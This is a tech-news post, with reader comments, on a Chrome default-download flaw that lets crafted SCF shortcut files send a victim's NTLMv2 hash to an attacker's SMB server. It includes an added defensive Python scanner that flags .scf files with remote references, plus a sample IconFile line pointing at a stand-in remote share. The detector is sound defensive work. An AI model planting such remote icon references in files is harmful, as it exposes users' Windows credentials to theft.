Stealing Windows Credentials Using Google Chrome (helpnetsecurity.com) 13

Posted by EditorDavid from the browser-bugs dept.
Orome1 writes: A default setting in Google Chrome, which allows it to download files that it deems safe without prompting the user for a download location, can be exploited by attackers to mount a Windows credential theft attack using specially-crafted SCF shortcut files, DefenseCode researchers have found. What's more, for the attack to work, the victim does not even have to run the automatically downloaded file. Simply opening the download directory in Windows File Explorer will trigger the code icon file location inserted in the file to run, and it will send the victim's username, domain and NTLMv2 password hash to a remote SMB server operated by the attackers.
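
A defensive check for the behaviour the summary describes, as an added example that is not part of the original story or of DefenseCode's research: it scans a download directory for .scf files in which any key=value line points at a remote host. The `IconFile` key name, the `host.example.invalid` host and the file names in the samples are assumptions, constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Value that names a remote host: \\host\share, //host/share or file://host/...
REMOTE_VALUE = re.compile(
    r'^(?:\\\\|//)(?P<unc>[^\\/\s]+)[\\/]|^file://(?P<url>[^\\/\s]+)/', re.I)

def remote_references(text):
    """Return (key, host) for each key=value line whose value is a remote path."""
    hits = []
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if not sep:
            continue  # section headers and blank lines carry no value
        m = REMOTE_VALUE.match(value.strip().strip('"'))
        if m:
            hits.append((key.strip(), m.group("unc") or m.group("url")))
    return hits

def scan_directory(directory):
    """Map each .scf file name under directory to its remote references."""
    findings = {}
    for path in Path(directory).rglob("*"):
        if not (path.is_file() and path.suffix.lower() == ".scf"):
            continue
        raw = path.read_bytes()
        # Text files written on Windows may be UTF-16 with a byte-order mark.
        utf16 = raw[:2] in (b"\xff\xfe", b"\xfe\xff")
        hits = remote_references(raw.decode("utf-16" if utf16 else "latin-1"))
        if hits:
            findings[path.name] = hits
    return findings

def demo():
    """Run the scan over constructed fragments (not complete shortcut files)."""
    remote = "IconFile=\\\\host.example.invalid\\share\\icon.ico\n"
    with tempfile.TemporaryDirectory() as d:
        Path(d, "local.scf").write_text("IconFile=C:\\Windows\\explorer.exe,3\n")
        Path(d, "remote.SCF").write_text(remote)
        Path(d, "wide.scf").write_bytes(remote.encode("utf-16"))
        Path(d, "notes.txt").write_text(remote)  # wrong extension: ignored
        return scan_directory(d)

if __name__ == "__main__":
    for name, hits in sorted(demo().items()):
        print(name, hits)
```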


  • And this is EXACTLY why all of the LAN > WAN firewalls I manage have SMB/CIFS blocked. There is no reason to send that traffic over WAN. If it is needed for connection to a remote location, that's what a VPN connection is for.

  • I can't get over the fact in 2017 Microsoft has yet to incorporate a single secure authentication protocol into any of its operating systems. They haven't even tried.

    It would be relatively trivial to select a PAKE and make it backwards compatible with existing NT hash databases. They just don't seem to care.
